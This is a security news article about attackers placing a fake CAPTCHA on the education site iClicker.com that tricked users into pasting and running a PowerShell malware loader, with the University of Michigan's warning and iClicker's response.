Education site iClicker.com was hijacked last month to display a malicious CAPTCHA test intended to trick users into installing Windows malware.
The site operates as an IT service for teachers that helps them conduct multiple-choice quizzes or even take attendance. The iClicker website says its products are in use by 5,000 instructors and 7 million students.
The hack placed a fake CAPTCHA test on the landing page for iClicker.com, according to BleepingComputer. Normally, CAPTCHA tests are designed to deter web-scraping bots by asking online visitors to complete a challenge, like identifying objects in an image. But in this case, the malicious CAPTCHA test dressed up the challenge as a set of computer commands: “Press Win + R,” “Press CTRL + V” and then “Enter.”
Unaware users might perform the instructions, thinking it’s an innocuous request. But in reality, the first command will trigger the PC to open the run dialog box, a way to launch programs. Hitting “CTRL + V” will then paste some malicious computer code that the CAPTCHA test added to their clipboard. Pressing Enter will then execute the code.
The University of Michigan’s IT security team initially warned students about the fake CAPTCHA test earlier this month. The pasted computer code operates as a PowerShell script that will retrieve additional malware when run, giving the hacker remote access to the PC.
Example of a fake CAPTCHA website (Credit: Malwarebytes)
Get Our Best Stories!
Stay Safe With the Latest Security News and Updates
By clicking Sign Me Up, you confirm you are 16+ and agree to our Terms of Use and Privacy Policy.
Thanks for signing up!
Your subscription has been confirmed. Keep an eye on your inbox!
But it appears the fake CAPTCHA was only on iClicker.com for less than a week. “Users of iClicker are at risk if they logged into the iClicker site and followed the directions in the fake CAPTCHA from April 12-16,” the University of Michigan says.
Parent company Macmillan Learning didn’t immediately respond to a request for comment. But in a security bulletin, iClicker confirmed the hijacking. “An unrelated third party placed a false Captcha on our iClicker landing page before users logged into iClicker on our website,” the notice says. “This third party was hoping to get users to click on the false captcha similar to what we unfortunately experience quite often in phishing emails these days.”
Recommended by Our Editors
That said, it looks like iClicker didn’t want to attract too much attention. BleepingComputer notes the security bulletin was configured to prevent search engines from indexing it.
Although it’s unclear what malware was installed, the bulletin adds that teachers or students who fell for the fake CAPTCHA test should immediately run antivirus software on their PCs. Affected victims should also consider changing their passwords since it’s possible the malware was designed to steal login credentials and cookies from internet browsers.
The incident is also a reminder to be careful around CAPTCHA tests that ask you to perform unusual keyboard commands. Security researchers have also spotted fake CAPTCHA tests targeting gamers.
About Michael Kan
Senior Reporter
Leave a Comment
Your email address will not be published. Required fields are marked *